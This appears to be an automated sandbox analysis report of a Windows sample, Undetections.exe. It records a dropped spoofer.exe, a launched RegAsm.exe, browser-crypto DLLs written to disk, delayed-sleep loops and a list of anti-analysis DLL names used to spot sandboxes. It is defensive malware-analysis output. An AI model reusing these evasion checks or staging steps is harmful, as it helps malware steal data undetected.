                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: Undetections.exeVirustotal: Detection: 30%
                          Source: Undetections.exeReversingLabs: Detection: 26%
                          Source: RegAsm.exeString found in binary or memory: t-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.
                          Source: RegAsm.exeString found in binary or memory: 48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.office.co
                          Source: unknownProcess created: C:\Users\user\Desktop\Undetections.exe "C:\Users\user\Desktop\Undetections.exe"
                          Source: C:\Users\user\Desktop\Undetections.exeProcess created: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe "C:\Users\user\AppData\Roaming\Undetections\spoofer.exe"
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\Desktop\Undetections.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\Undetections.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                          Source: Undetections.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Undetections.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: Undetections.exeStatic file information: File size 1800192 > 1048576
                          Source: Undetections.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x177800
                          Source: Undetections.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed#fontawesome.sharpQcostura.fontawesome.sharp.dll.compressed source: Undetections.exe
                          Source: Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\projects\fontawesome-sharp\FontAwesome.Sharp\obj\Release\net472\FontAwesome.Sharp.pdb source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Undetections.exe
                          Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressedlBkq source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr
                          Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Undetections.exe
                          Source: Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\7xp79cm1d4qf1g\obj\Release\Beyound.pdb source: spoofer.exe.0.dr

                          Data Obfuscation

                          Source: Undetections.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: Yara matchFile source: Undetections.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Undetections.exe.430000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1639618593.0000000000478000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Undetections.exe PID: 7308, type: MEMORYSTR
                          Source: Undetections.exeStatic PE information: 0xEBAED08E [Wed Apr 20 01:46:54 2095 UTC]
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418460 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418460
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FDF108 push eax; mov dword ptr [esp], edx 0_2_05FDF11C
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FDE8C8 push eax; ret 0_2_05FDE8D1
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FD221F push eax; mov dword ptr [esp], ecx 0_2_05FD2231
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_0794A08A push 840704CFh; iretd 0_2_0794A091
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A3B5 push ecx; ret 4_2_0041A3C8
                          Source: spoofer.exe.0.drStatic PE information: section name: .text entropy: 7.991881969921377
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
                          Source: C:\Users\user\Desktop\Undetections.exeFile created: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dll
                          Source: C:\Users\user\Desktop\Undetections.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\Users\user\Desktop\Undetections.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR
                          Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                          Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                          Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: C00000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: 2940000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: CB0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory allocated: 12C0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory allocated: 3170000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory allocated: 1350000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_0F0F9E38 sldt word ptr [eax]0_2_0F0F9E38
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 600000
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599808
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599688
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599563
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599445
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599329
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599204
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599079
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598954
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598829
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598704
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598579
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598454
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598329
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598204
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598086
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597969
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597860
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597725
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597610
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 593985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 593860Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeWindow / User API: threadDelayed 1854Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeWindow / User API: threadDelayed 7956Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 5.4 %
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599808s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599688s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599563s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599445s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599329s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599204s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599079s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598954s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598829s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598704s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598579s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598454s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598329s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598204s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598086s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597969s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597725s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -593985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -593860s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe TID: 7644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410250 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410382h4_2_00410250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401120 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,4_2_00401120
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D200
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416370 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,4_2_00416370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A410
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417420 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00417420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00416BC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040AF10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417010 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,4_2_00417010
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A860
